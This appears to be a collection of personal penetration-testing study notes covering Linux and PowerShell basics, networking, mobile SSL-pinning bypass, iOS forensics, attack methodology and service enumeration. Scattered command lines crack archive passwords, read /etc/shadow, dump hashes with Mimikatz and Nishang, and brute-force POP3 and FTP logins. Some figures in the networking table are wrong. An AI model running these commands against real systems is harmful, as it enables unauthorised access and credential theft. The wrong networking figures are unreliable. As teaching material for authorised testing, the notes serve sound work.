### Websites

* LinkedIn
* Twitter
* Facebook

### Look For

* Pictures
  * Badge photos
  * Desk pictures
* People and their information

## OSINT Fundamentals

--------------------------------------------------------------------------------
/misc/containers.md:
--------------------------------------------------------------------------------
# Containers

## Enumeration

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md)

### deepce

Like LinEnum.sh for containers.

[https://github.com/stealthcopter/deepce](https://github.com/stealthcopter/deepce)

--------------------------------------------------------------------------------
/misc/interesting-files.md:
--------------------------------------------------------------------------------
# Interesting Files

## File Types

### zip

```bash
# Try to unzip the file
unzip filename.zip
# If a password is needed, attempt to crack it
zip2john filename.zip >> filename.zip.hash
john filename.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

### rar

```bash
unrar e filename.rar
rar2john filename.rar >> filename.rar.hash
john filename.rar.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

### pfx

```bash
# Try to view file info
openssl pkcs12 -in filename.pfx -info
# If a password is needed, attempt to crack it
pfx2john filename.pfx >> filename.pfx.hash
john filename.pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

After entering the password it will extract the certificates and private keys.

```bash
# Extract the keys
openssl pkcs12 -in filename.pfx -nocerts -out key.pem -nodes
# Extract the certificates
openssl pkcs12 -in filename.pfx -nokeys -out key.cert
```

If the WinRM port (5985, 5986) is open it could be possible to log in to the target using Evil-WinRM with the extracted certificate and key.
43 | 44 | ```bash 45 | evil-winrm -S -i -c key.cert -k key.pem 46 | ``` 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /misc/linux.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | ## Kali 4 | 5 | ## Commands 6 | 7 | ### Sudo Overview 8 | 9 | ```bash 10 | # Run command as root 11 | sudo cat /etc/shadow 12 | # Switch to root user 13 | sudo su - 14 | sudo -i 15 | ``` 16 | 17 | ### Navigating Filesystem 18 | 19 | ```bash 20 | pwd # Print working directory 21 | cd # Change directory 22 | ls # List files and directories 23 | mkdir # Make a directory 24 | touch # Make a file 25 | cp # Copy a file or directory 26 | rm # Remove a file or directory 27 | mv # Move or rename a file or directory 28 | locate # Locat a file or directory 29 | man # Manual pages for a command 30 | ``` 31 | 32 | ### Users and Privileges 33 | 34 | ```bash 35 | d rwx r-x r-w # Directory with permissions 755 36 | - rwx r-- r-- # File with permissions 744 37 | chmod # Change mode of a file or directory 38 | chown # Change owernship of a file or directory 39 | adduser # Adds a new user 40 | passwd # Change the password for a user 41 | su # Switch/substitute to a user 42 | ``` 43 | 44 | ### Network Commands 45 | 46 | ```bash 47 | ifconfig / ip a # Configure a network interface 48 | iwconfig # Configure a wireless network interface 49 | ping # Send ICMP ECHO_REQUEST to network hosts 50 | arp # Resolve IP address to a MAC address 51 | netstat # Print network connections, tables, and statistics 52 | route / ip r # Print routing table 53 | ``` 54 | 55 | ### Installing and Updating Tools 56 | 57 | ```bash 58 | apt update # Updates list of available packages and their versions, but it does not install or upgrade them. 59 | apt upgrade # Actually installs newer versions of the packages you have. 
apt install   # Install software
git clone     # Download software from GitHub or another git provider
```

### Files

```bash
echo "hello" > file.txt    # Write (overwrite) text to a file
echo "world" >> file.txt   # Append text to a file
touch                      # Create a new file
vim/nano                   # CLI file editors
gedit                      # GUI file editor
cat                        # Concatenate files and print to standard output
```

## Bash Scripting

### Examples

Print out a variable called `str` which contains the string "Hello World!"

```bash
#!/bin/bash
str="Hello World!"
echo "$str"

./hello.sh
```

Print out the number of arguments (`$#`) and then the argument values.

```bash
#!/bin/bash
echo $#
echo $1 $2

./argtest.sh Hello World
```

Take a number as the first argument and compare it against a fixed value.

```bash
#!/bin/bash
num1="$1"
num2=17
if [ "$num1" -ge "$num2" ]
then
    echo "$num1 is greater than or equal to $num2"
else
    echo "$num1 is less than $num2"
fi
echo "Sum is $((num1 + num2))"

./vartest.sh 19
```

Read input on a new line, then read input again on the same line as the prompt (`-p`).

```bash
#!/bin/bash
echo "What is your name?"
read name
echo "Hello $name"
echo
read -p "Remind me, what is your name again? " name
echo "Hello again $name"

./readtest.sh
```

For loop iterating through an array.
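The argument-driven scripts above (argtest.sh, vartest.sh, iftest.sh) use whatever `$1` holds. The following is an added example, not from the original notes, that validates its input first: it rejects a missing or non-numeric number instead of letting `[ -ge ]` fail with a shell error, and quotes `$1` so that an empty argument cannot collapse `[ -d $1 ]` into the one-argument form of `test`, which is true for any non-empty string. The function names (is_number, compare_to, check_dir, count_args, main) are this example's own.

```bash
#!/bin/bash
# Added example (not from the original notes): the checks from vartest.sh and
# iftest.sh, rewritten with input validation and quoted expansions. All
# function names here are this example's own.

# is_number VALUE: succeed only if VALUE is a non-negative integer.
# The case pattern rejects the empty string and anything containing a
# non-digit, so a stray word never reaches the numeric [ -ge ] test.
is_number() {
    case "$1" in
        '' | *[!0-9]*) return 1 ;;
        *) return 0 ;;
    esac
}

# compare_to NUM1 NUM2: print the comparison and the sum (as vartest.sh does).
# Returns 2 on bad input instead of letting [ -ge ] print a shell error.
compare_to() {
    local num1="$1"
    local num2="$2"
    if ! is_number "$num1" || ! is_number "$num2"; then
        echo "error: expected two non-negative integers, got '$num1' and '$num2'" >&2
        return 2
    fi
    if [ "$num1" -ge "$num2" ]; then
        echo "$num1 is greater than or equal to $num2"
    else
        echo "$num1 is less than $num2"
    fi
    echo "Sum is $((num1 + num2))"
}

# check_dir PATH: succeed only if PATH is an existing directory (as iftest.sh does).
# Quoting "$1" matters: unquoted, an empty argument turns [ -d $1 ] into [ -d ],
# a one-argument test that is true for any non-empty string, so the script
# would report that "" exists.
check_dir() {
    if [ -n "$1" ] && [ -d "$1" ]; then
        echo "$1 exists"
        return 0
    fi
    echo "${1:-<empty>} does not exist." >&2
    return 1
}

# count_args ARGS...: print the number of arguments received (what $# holds in argtest.sh).
count_args() {
    echo "$#"
}

# main NUM DIR: refuse to run with the wrong number of arguments.
main() {
    if [ "$#" -ne 2 ]; then
        echo "Syntax: $0 <number> <directory>" >&2
        return 1
    fi
    compare_to "$1" 17 || return $?
    check_dir "$2"
}

# Only run main when arguments were given, so the file can also be sourced
# to reuse the functions.
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Saved as, for instance, `safeargs.sh` (a name chosen here), `./safeargs.sh 19 /tmp` prints the comparison, the sum and `/tmp exists`; `./safeargs.sh abc /tmp` stops with an error on stderr and exit status 2, and running it with no arguments prints the syntax line and exits 1.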
```bash
#!/bin/bash
names=('Peter' 'Paul' 'Mary' 'David' 'Joe')
x=${#names[@]}
for ((i=0; i<x; i++))
do
    echo "${names[$i]}"
done

./fortest.sh
```

While loop and then an until loop.

```bash
#!/bin/bash
runs=6
while [ $runs -gt 0 ]
do
    echo "Run down at number $runs"
    let runs=runs-1
done
until [ $runs -gt 6 ]
do
    echo "Run up at number $runs"
    let runs=runs+1
done

./wutest.sh
```

If/else statement checking whether a directory exists and, if it does, listing its contents.

```bash
#!/bin/bash
if [ -d "$1" ]
then
    echo "$1 exists"
    ls "$1"
else
    echo "$1 does not exist."
fi

./iftest.sh
```

Using a function, a select statement, and a case statement to print out the chosen city.

```bash
#!/bin/bash
function speak
{
    if [ "$1" = "Paris" ]
    then
        echo "Language used is French"
    elif [ "$1" = "Hanoi" ]
    then
        echo "Language used is Vietnamese, with a little French"
    else
        echo "Language used is English, of one form or another!"
    fi
}
PS3=">"
echo "Let's check the language"
select city in "Paris" "Melbourne" "Toronto" "Seattle" "Hanoi" "exit"
do
    if [ "$city" = "exit" ]
    then
        break
    fi
    case $city in
        Paris)
            echo "City is Paris, France";;
        Melbourne)
            echo "City is Melbourne, Australia";;
        Toronto)
            echo "City is Toronto, Canada";;
        Seattle)
            echo "City is Seattle, USA";;
        Hanoi)
            echo "City is Hanoi, Vietnam";;
    esac
    speak "$city"
done
echo "Bye!"

./fntest.sh
```

## Scripts

### Ping Sweeper

#### Ping

```bash
# Ping example
ping 192.168.4.29
PING 192.168.4.29 (192.168.4.29) 56(84) bytes of data.
64 bytes from 192.168.4.29: icmp_seq=1 ttl=128 time=0.403 ms
# Send the ping output to a file
ping 192.168.4.29 > ip.txt
# Grab just the IP address from the file
cat ip.txt | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
```

#### Script that pings every address in the given /24 (iterating the last octet) and prints only the responding IPs

```bash
#!/bin/bash

if [ "$1" == "" ]
then
    echo "You forgot an IP address!"
    echo "Syntax: ./ipsweep.sh 192.168.4"
else
    for ip in $(seq 1 254); do
        ping -c 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
fi
```

#### One-liner running nmap against the IP addresses found

```bash
for ip in $(cat ip.txt); do nmap $ip; done
```
--------------------------------------------------------------------------------
/misc/networking.md:
--------------------------------------------------------------------------------
# Networking

## IP Addresses

Operate at Layer 3 (Network).

### IPv4

32-bit address. 2^32 = 4,294,967,296 possible IP addresses.

#### Example

```bash
# Example 1
kali@kali:~$ ifconfig
eth0: flags=4163 mtu 1500
        inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
# Example 2
kali@kali:~$ ip a s
```

### Classes

#### Private IP Addresses

| Network Class        | Network Numbers                | Network Mask  | No. of Networks | No. of Hosts per Network |
| -------------------- | ------------------------------ | ------------- | --------------- | ------------------------ |
| Class A              | 10.0.0.0                       | 255.0.0.0     | 126             | 16,646,144               |
| Class B              | 172.16.0.0 to 172.31.0.0       | 255.255.0.0   | 16,383          | 65,024                   |
| Class C              | 192.168.0.0 to 192.168.255.255 | 255.255.255.0 | 2,097,151       | 254                      |
| Loopback (localhost) | 127.0.0.0 to 127.0.0.7         | 255.255.255.0 | -               | -                        |

### NAT (Network Address Translation)

A technique for letting multiple computers share a single public IP address. NAT assigns a unique private address to each computer on the local network and rewrites incoming/outgoing traffic so that data reaches the right host.

### IPv6

128-bit address. 2^128 = 3.4028236692093846346337460743177e+38 possible IP addresses.

#### Example

```bash
# Example 1
kali@kali:~$ ifconfig
eth0: flags=4163 mtu 1500
        inet6 fe80::20c:29ff:fe0a:4205 prefixlen 64 scopeid 0x20
# Example 2
kali@kali:~$ ip a s
```

## MAC Addresses

Operate at Layer 2 (Data Link).

48-bit address in two halves: the first 24 bits form the Organizationally Unique Identifier (OUI) and the last 24 bits form a serial number (formally called the extension identifier).

A media access control address (MAC address) is a unique identifier assigned to a network interface controller (NIC) for use as a network address in communications within a network segment.

#### Example

```bash
# Example 1
kali@kali:~$ ifconfig
eth0: flags=4163 mtu 1500
        ether 00:0c:29:0a:42:05 txqueuelen 1000 (Ethernet)
# Example 2
kali@kali:~$ ip a s
```

## TCP, UDP, and the Three-Way Handshake

### TCP

Transmission Control Protocol. Connection-oriented.

#### Three-Way Handshake

1. **SYN** - The client sends a SYNchronize packet to the server.
2. **SYN-ACK** - The server sends back a SYNchronize-ACKnowledgement to the client.
3. **ACK** - The client sends an ACKnowledge to the server.

### UDP

User Datagram Protocol. Connectionless; no handshake takes place.

## Common Ports and Protocols

{% tabs %}
{% tab title="TCP" %}
* 21 (FTP)
* 22 (SSH)
* 23 (Telnet)
* 25 (SMTP)
* 53 (DNS)
* 80/443 (HTTP/S)
* 110 (POP3)
* 139+445 (SMB)
* 143 (IMAP)
{% endtab %}

{% tab title="UDP" %}
* 53 (DNS)
* 67, 68 (DHCP)
* 69 (TFTP)
* 161 (SNMP)
{% endtab %}
{% endtabs %}

## The OSI Model

| Layer | Layer Name         | Examples                 | Description                                                                  |
| ----- | ------------------ | ------------------------ | ---------------------------------------------------------------------------- |
| 7     | Application Layer  | HTTP, SMTP, DNS          | Human-computer interaction layer where applications access network services  |
| 6     | Presentation Layer | WMV, JPEG, MOV           | Ensures data is in a usable format; where data encryption occurs             |
| 5     | Session Layer      | Session management       | Maintains connections and is responsible for controlling ports and sessions  |
| 4     | Transport Layer    | TCP, UDP                 | Transmits data using transport protocols such as TCP and UDP                 |
| 3     | Network Layer      | IP addresses, routing    | Decides which physical path the data will take                               |
| 2     | Data Link Layer    | Switching, MAC addresses | Defines the format of data on the network                                    |
| 1     | Physical Layer     | Data cables, Cat6        | Transmits the raw bit stream over the physical medium                        |

#### Mnemonic

* PDNTSPA
* Please Do Not Throw Sausage Pizza Away

#### Troubleshooting

* Typically start with layer 1 and work your way up to layer 7

## Subnetting

TBD
--------------------------------------------------------------------------------
/misc/note-taking.md:
--------------------------------------------------------------------------------
# Note Taking

## Note Taking Tools

* KeepNote
* OneNote
* CherryTree
* Joplin

## Screenshot Tools

* Greenshot
* Flameshot
--------------------------------------------------------------------------------
/misc/powershell.md:
--------------------------------------------------------------------------------
# PowerShell

## Examples

### Commands

```powershell
Get-Verb                  # List available verbs
(Get-Verb).count          # Count the items in a command's output
help push                 # Get help on a specific verb
help pushd                # Get additional help on a command found in the previous output
hostname > direct.txt     # Redirect output to a file
dir >> direct.txt         # Append output to a file
type direct.txt           # Print a file to the console
cat direct.txt            # Another way to print a file to the console
Get-Process               # List running processes
echo "Hello World"        # Send Hello World to the console
Write-Host "Hello World"  # Send Hello World to the console
```

### Variables

```powershell
$name = 'Erich'
$number = 42
$nlist = 1,3,5,7,11,13
($nlist).count
echo "The list is $nlist"
```

### If Statements

```powershell
if ($nlist[1] -gt 0)
{
    echo "Positive"
}
```

### Loops

```powershell
$i = 1
do {
    $val = $nlist | Select-Object -Index $i
    echo "Value is $val"
    $i = $i + 1
} while ($i -le ($nlist).count)
```

```powershell
ForEach ($val in $nlist)
{
    echo "Value is $val"
}
```

## Nishang

```powershell
# Pre-req
Set-ExecutionPolicy Unrestricted
gci c:\nishang\ -recurse | Unblock-File
Import-Module .\nishang.psm1
# Example commands
Get-Command -Module nishang
Get-Information > info.txt
Get-Help Invoke-Mimikatz -full
Get-Passhashes
Invoke-PortScan -startaddress 10.0.2.1 -endaddress 10.0.2.8 -ScanPort
Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile"
Invoke-BruteForce 10.0.2.8 -service FTP -userlist users.txt -passwordlist passes.txt -verbose -StopOnSuccess
Invoke-Prasadhak   # Requires an API key from VirusTotal
```
--------------------------------------------------------------------------------
/misc/todo.md:
--------------------------------------------------------------------------------
# TODO

## Checklist

### HTB

#### ippsec videos / ippsec.rocks

* [ ] Timelapse
* [ ] ...

#### Rana, oxdf, other writeups

### THM

#### Service Enumeration

--------------------------------------------------------------------------------
/mobile/android/support-and-tools.md:
--------------------------------------------------------------------------------
# Support and Tools

## Notes

### OS Versions

* Android 6 - Device does not need to be rooted
* Android 7.1 - Device needs to be rooted before it will accept the Burp cert

### Certificate Pinning

## Setup

### Frida Server

Find the CPU architecture of the device:

`adb shell getprop ro.product.cpu.abi`

Download the matching Frida server build from the following URL and extract it:

* https://github.com/frida/frida/releases/
* frida-server-xxxx-android-x86.xz
* frida-server-xxxx-android-x86\_64.xz
* Windows: `adb push C:\ADB\ /data/local/tmp`
* Linux: `adb push ADB/ /data/local/tmp`
* Both: `adb shell chmod 777 /data/local/tmp/`

### Burp

1. Open Burp and go to the Proxy tab
2. Select the Options tab
3. Click Import/Export CA Certificate
4. Export the certificate in DER format
5. Push the certificate onto the device with ADB (needed later for Frida)
   1. `adb push cacert.der /data/local/tmp/cert-der.crt`

### SSL Pinning

Script used to override the certificate pinning mechanism:

[https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/](https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/)

#### Script injection to bypass certificate pinning

* Push the script onto the device
  * `adb push C:\ADB\fridascriptjs /data/local/tmp`
* Check and run the Frida server on the device
  * `adb shell /data/local/tmp/ &`
* List all the running processes on the device
  * `frida-ps -U`
* Locate your application's package name in the list
  * i.e. 3672 com.twitter.android
* Hook the Frida script into your application
  * `frida -U -f com.twitter.android -l --no-pause`

#### Why we need a certificate pinning bypass

* Mobile apps encrypt HTTPS traffic, using a certificate to do so
* We can insert the Burp certificate into Android to capture requests
* Developer protection: certificate pinning
  * The app checks that only its own cert can encrypt traffic
* Our solution: certificate pinning bypass
  * Overwrite the code in the API that is responsible for checking the cert
  * Frida

## Tools

* ADB (Android Debug Bridge)
* jadx
* dex2jar
* Frida
* Burpsuite
* Genymotion
* Android Studio Virtual Device Manager
--------------------------------------------------------------------------------
/mobile/ios/README.md:
--------------------------------------------------------------------------------
# iOS

--------------------------------------------------------------------------------
/mobile/ios/ios-forensics.md:
--------------------------------------------------------------------------------
---
description: https://tryhackme.com/room/iosforensics
---

# iOS Forensics

## What is Digital Forensics and How is it Used Today?

Digital forensics is the digitisation of the traditional use and applications of forensic investigation, for example within police departments after a crime has been committed.

Artefacts such as blood, fingerprints or hair fibres are used in criminal investigations to paint a picture of the events that took place and who was involved. Digital forensics collects the same kind of artefacts, except that these artefacts are events on a digital device.

Removing evidence or covering your tracks is a fallacy to some extent, especially on digital devices. Someone may be able to hide exactly what they were doing, but the act of hiding it will, in turn, leave a trace that _something_ was hidden.

## Problems Facing Digital Forensics Analysts

### Time Consumption & Resources

Digital forensics is, without doing it justice, an incredibly time-consuming process. Despite the toolkits and suites available, you find yourself having to analyse data bit by bit to find that one smoking gun. Now extend that to a 1TB drive: not so fun.

Because forensic images are exact bit-for-bit copies of an acquired device or system, you need the facilities to store this data before it can be processed. Take a file server holding 10 terabytes of data. You need 10 terabytes to store the image, plus another 10 terabytes for the backups of that image; suddenly you have at least 20 terabytes sitting around.

### Understanding the Person

As a forensic analyst, you have to piece various parts of information together into a formal and well-documented timeline of events for presentation. For example, if you were to try to find a bit of text in a document on your computer, you'd know where to go. Now take away the desktop/GUI and terminal, then ask your friend to try and find it through means similar to the screenshot in Task 2. Pretty hard, huh?

### Encryption

As it stands, an effective and secure implementation of encryption is one of the biggest hurdles for forensic analysts. The problem, mostly? People and/or devices themselves leave the decryption keys within the same platform, as in the case of the iPhone you are going to analyse. After all, it's that catch-22: a complex password is a strong password until you need to write it down.

### Steganography

We all know (and love) steganography here: hiding data within data. In some cases it is more secure than cryptography; whereas cryptography makes the contents unreadable, steganography masks the very existence of the data.

### Cost of Entry

Sure, you can pick up FTK Imager Lite or Autopsy for free, but these tool suites, whilst being lifesavers, are only the tip of the iceberg in digital forensics.

For example, you're not going to be creating any file system images of iPhones in FTK Imager Lite, and if you do, you're going through it bit for bit, if it is unencrypted at all.

Enter infamous companies such as Cellebrite. This company is arguably at the forefront of data acquisition. Costing approximately $15,000 for the equipment and adapters, specialist kits such as these aren't available to hobbyists, only to law enforcement, government agencies and specific universities. Cellebrite was used to dump this iPhone.

On top of the cost of purchasing sophisticated tools, there is a heavy expectation of certifications and even degrees; that's what filled most of my 3 years at university!

## iOS File Systems

Apple, in their notorious way of doing things, have created their own file system formats: AFS and HFS+.

Starting with the oldest, HFS+ (Mac OS Extended) is the legacy file system used by Apple since 1998 and is still supported today. The issue is that HFS was not future-proof, given that it cannot support file timestamps past February 6th, 2040 (Vigo., 2018).

Whilst HFS+ didn't support encryption in its entirety (a win in our books as forensic analysts), any device such as an iMac or an iPhone past iOS 10.3 will have had its file system converted from HFS+ to AFS automatically.

AFS, or Apple File System (creative, right...!), boasts many features, including full disk encryption, which is worrisome for analysts considering that all devices past iOS 10.3 will have this structure. From a design point of view, however, AFS introduces smarter data management, as in the screenshot below, where a file requiring 3 blocks' worth of space would, when copied, require another 3 blocks.

Instead of writing and storing the entire data again (taking up six blocks in our example), AFS simply creates another reference to the file (taking up a total of four blocks in our example), similar to `inodes` in Linux.

## Modern iOS Security

Throughout the years of design, Apple's operating system for its iOS devices has improved tenfold in protecting its users' data. So much so that companies have built their reputation purely on being the ones who can unlock iPhones. The ability to do so for law enforcement / governmental authorities is a sprint race behind very, very closed doors.

For example, Elcomsoft recently announced being able to acquire file system data from iPhones running iOS 13 and 13.3 without any jailbreaking. That in itself is groundbreaking in mobile device forensics. And that's only what we've been told about!

But we're average Joes here. We can't be paying thousands for bits of kit and licensing. Nor do we have the space to carry every phone adapter from Nokias to USB-A or Micro-B cables.

You might be thinking: surely, with all of the security measures iPhones have these days, such as Touch ID and Face ID on top of the passcode, your data is safe, right?

Well, toolkits such as the UFED can use all of the acquisition methods that we discussed in task 8. What's worth noting, however, is that the UFED is capable of forcing the iDevice to boot using UFED's custom boot loader, bypassing the entire iOS operating system, similar to rooting an Android, and resulting in a dump of the entire device. The issue with this? It contradicts the golden rule of digital forensics: never turn it off.

People often install "panic switches" on devices, where a shutdown event can trigger a complete wipe of the device. Or, in the case of iPhones, if the iPhone isn't properly isolated, it can be remotely wiped via iCloud, a very true story.

iOS' "Restricted Mode"

Since 2018, Apple has enforced a "Restricted Mode" on all iDevices running that version and above. This feature disables data input/output over the Lightning (charge) cable until the iPhone is unlocked with a passcode. Devices must be trusted before any data can be written, or so by design.

## Data Acquisition & Trust Certificates

## Looking for Loot!

## Analyzing iOS Files
--------------------------------------------------------------------------------
/mobile/tcm-mobile/README.md:
--------------------------------------------------------------------------------
---
description: https://academy.tcm-sec.com/courses/enrolled/1557555
---

# TCM - Mobile

## Introduction and Course Resources

### Course Resources

* [OWASP Mobile Application Pentesting GitBook](https://mobile-security.gitbook.io/mobile-security-testing-guide/overview/0x03-overview)
* [OWASP Mobile Top 10](https://owasp.org/www-project-mobile-top-10/)
* [SecJuice Intro to Frida & Objection](https://www.secjuice.com/objection-frida-guide/)
* iOS Research and Exploration: Volume I by James Duffy
* [HackTricks Checklist (Android)](https://book.hacktricks.xyz/mobile-pentesting/android-checklist)
* [HackTricks Checklist (iOS)](https://book.hacktricks.xyz/mobile-apps-pentesting/ios-pentesting-checklist)

### Mobile Pentesting Certification Landscape

#### Certifications / Courses

* [eLearnSecurity Mobile Application Penetration Tester](https://elearnsecurity.com/product/emapt-certification/)
* [SANS Institute GMOB (GIAC Certified Device Security Analyst)](https://www.giac.org/certifications/mobile-device-security-analyst-gmob/)
* [EC-Council](https://www.eccouncil.org/hands-on-android-security/)
* [Infosec Institute](https://www.infosecinstitute.com/skills/learning-paths/certified-mobile-and-web-app-penetration-tester-cmwapt/)

## Penetration Testing Process

### The Penetration Testing Process

1. Reconnaissance
   1. Active - physical recon, interacting with targets via social engineering, anything with a "hands-on" approach to the target
   2. Passive - using tools like LinkedIn, Google and publicly available info to enumerate the target
2. Scanning/Enumeration
   1. Using tools that touch the target's physical or digital infrastructure to enumerate vulnerabilities, open ports, etc.
      1. Examples: nmap, dirb, nikto
3. Exploitation
   1. Taking advantage of the vulnerabilities discovered through enumeration and recon
4. Privilege Escalation
   1. Once inside the system or environment, moving laterally or vertically to obtain more access
      1. Lateral - from one device or app to another device or app as the same user
      2. Vertical - from a low-level user account to a higher-level account
5. Cover Your Tracks
   1. Eliminating evidence that may incriminate you or leave signs of exploitation
   2. Changing timestamps, erasing video footage, etc.
6. Reporting
   1. The result of all your hard work: outlining the findings and exploits to the company so that they can fix them
   2. This is what separates us from the bad guys

### The Mobile Application Penetration Testing Process

1. Reconnaissance
   1. Find information about the company
      1. Earnings reports and press releases often contain info about mobile apps
   2. Find the target app on the Play Store or Apple App Store
      1. Read reviews
      2. Enumerate who created the app
      3. Enumerate the different app versions and patch notes
      4. Enumerate the company's other apps
2. Static Analysis
   1. Reading the application code via manual or automated tools to assess its security
      1. Looking for hardcoded strings, security misconfigurations, or additional targets extracted from the app
   2. Static analysis will sometimes trigger the pentesting process again, especially additional enumeration or fingerprinting
      1. Find a URL - recon, enumerate, exploit, etc.
         1. Many companies use different API gateways/paths for mobile apps than for the traditional website
      2. Find an email/username - recon using phonebook.cz, etc.
      3. Find a storage bucket - recon, enumerate with cloud\_enum
3. Dynamic Analysis
   1. Running the application and manipulating it
      1. Intercepting traffic with proxies like Burp Suite/Proxyman
      2. Dumping memory from the application to check for insecurely stored secrets
      3. Checking local storage for files created at runtime
      4. Breaking SSL pinning at runtime
   2. Dynamic analysis can often result in attacks related to the OWASP Top Ten
      1. SQL Injection, Cross-Site Scripting, IDOR, XXE, etc.
         1. Note on XSS: you often will not get XSS in the mobile app itself, but sometimes it can affect the full version of the website.
4. Reporting
   1. Often contains an executive summary as well as the specific vulnerabilities discovered
   2. Write the report with both the OWASP Top Ten (Web) and the OWASP Top Ten (Mobile) in mind
   3. Provide the business with the criticality as well as steps to reproduce
   4. Remember to mention the positive security implementations
--------------------------------------------------------------------------------
/penetration-testing-methodology/5-stages-of-ethical-hacking.md:
--------------------------------------------------------------------------------
# 5 Stages of Ethical Hacking

## 5 Stages of Ethical Hacking

### Reconnaissance

#### AKA Footprinting

* Finding out specific IP addresses, TCP & UDP services; identifying vulnerabilities
* Network, hosts, people involved

#### Active

Directly interacting with the target to gather information about it.

#### Passive

Trying to collect information about the target without directly accessing it. For this purpose, the hacker can use social media, public websites, etc.

### Scanning (& Enumeration)

Nmap, Nessus, Nikto, etc.

1. **Pre-attack** - The hacker scans the network for specific information based on the information gathered during reconnaissance.
2. **Port scanning** - This phase involves scanning the target for information such as open ports, live systems, and the various services running on the host.
3. **Vulnerability scanning** - Checking the target for weaknesses or vulnerabilities which can be exploited. Usually done with the help of automated tools.
4. **Network mapping/information extraction** - Finding the topology of the network, routers, firewalls and servers if any, plus host information, and drawing a network diagram with the available information. This map may serve as a valuable piece of information throughout the hacking process.

### Gaining Access (Exploitation)

This phase is where an attacker breaks into the system/network using various tools or methods. After entering a system, he has to increase his privilege to administrator level so he can install an application he needs, or modify or hide data.

#### Examples

* Phishing, MitM, Brute Force, Spoofing, DoS, BOF, Session Hijacking, BEC

### Maintaining Access

A hacker may just hack the system to show it was vulnerable, or he can be so mischievous that he wants to maintain or persist the connection in the background without the knowledge of the user. This can be done using Trojans, rootkits or other malicious files. The aim is to maintain access to the target until he finishes the tasks he planned to accomplish there.

### Clearing Tracks

No thief wants to get caught. An intelligent hacker always clears all evidence so that, at a later point in time, no one will find any traces leading to him. This involves modifying/corrupting/deleting log entries, modifying registry values, uninstalling all applications he used and deleting all folders he created.

#### Examples

* Clearing the cache and cookies
* Modifying registry values
* Modifying/corrupting/deleting log entries
* Clearing out sent emails
* Closing all the open ports
* Uninstalling all applications that he/she used
--------------------------------------------------------------------------------
/penetration-testing-methodology/the-cyber-kill-chain.md:
--------------------------------------------------------------------------------
# The Cyber Kill Chain

## 7 Stages

1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command and control
7. Actions

### Reconnaissance

* Cyber equivalent of "casing the joint"
* IP address scan of the business domain
* Port scan of active hosts
* Identify vectors for attack
  * Checking software versions
* Automated scanning to scale the attack -- botnets

### Weaponization

* Customize a vulnerability to a target
* Integrate into a cyberattack platform
* Purchased ready to run

### Delivery

* Email attachment
* Compromised website
* Log into the target
  * Default credentials
  * Stolen credentials
* Internet-exposed vulnerability
* Flash drive

### Exploitation

* Exploit a vulnerability
* Unauthorized use of credentials
* Unaware execution of malware

### Installation

* Install payload into memory or onto disk
* Execute payload after system restart
* Provides ongoing access

### Command and Control

* Connect to the command and control server
* Receive commands
  * List subdirectories and files
  * Extract a named file
  * Modify or replace software
* Determine the command and control server address

### Actions

* Action
  * Deface website
  * Steal sensitive information
  * Access a bank account
--------------------------------------------------------------------------------
/pentesting-network/110-pop3.md:
--------------------------------------------------------------------------------
# 110 (POP3)

## Enumeration

### Checks

* [ ] Check version for exploits
* [ ] Check mails for the presence of credentials

### Banner Grabbing

```bash
nc -nv 110
telnet 110
openssl s_client -connect :995 -crlf -quiet
```

### nmap

```bash
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port   # All are default scripts
```

## Commands

```
USER uid        Log in as "uid"
PASS password   Substitute "password" for your actual password
STAT            List number of messages, total mailbox size
LIST            List messages and sizes
RETR n          Show message n
DELE n          Mark message n for deletion
RSET            Undo any changes
QUIT            Logout (expunges messages if no RSET)
TOP msg n       Show first n lines of message number msg
CAPA            Get capabilities
```

## Brute Force

### Hydra

```bash
hydra -l -P /path/to/passwords.txt -f pop3 -V
hydra -S -v -l -P /path/to/passwords.txt -s 995 -f pop3 -V
```

### Metasploit

```bash
use auxiliary/scanner/pop3/pop3_login
```

## Example

```bash
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean

list

+OK 2 1807
1 786
2 1021

retr 1

+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,

Here is your login for remote desktop ... try not to forget it this time!

username: billydean
password: PA$$W0RD!Z
```
--------------------------------------------------------------------------------
/pentesting-network/111-rpcbind.md:
--------------------------------------------------------------------------------
# 111 (Rpcbind)

## Enumeration

### Checks

* [ ] Check for passwords in files on mountable drives

### rpcbind

```bash
rpcbind -p 192.168.1.101
```

### rpcinfo

```bash
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```

```bash
# Check general RPC info
rpcinfo

# Check what shares you can mount
showmount -e

# Mounting the share
# Make the directory
mkdir /mnt/share
# Mount the share
mount -t nfs :/share /mnt/share -nolock
```

### nmap

```bash
nmap -v -p 111 --script=nfs*

rpcclient -U "" $target
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID
```
--------------------------------------------------------------------------------
/pentesting-network/11211-memcached.md:
--------------------------------------------------------------------------------
# 11211 (Memcached)

--------------------------------------------------------------------------------
/pentesting-network/135-rpc.md:
--------------------------------------------------------------------------------
# 135 (RPC)

## Enumeration

####
--------------------------------------------------------------------------------
/pentesting-network/137-138-139-netbios.md:
--------------------------------------------------------------------------------
# 137,138,139 (NetBIOS)

## Enumeration

### Commands & Tools

#### nbtstat

```bash
nbtstat -n
nbtstat -A
```

#### nbtscan

```bash
nbtscan -v
```

#### net

```bash
net view
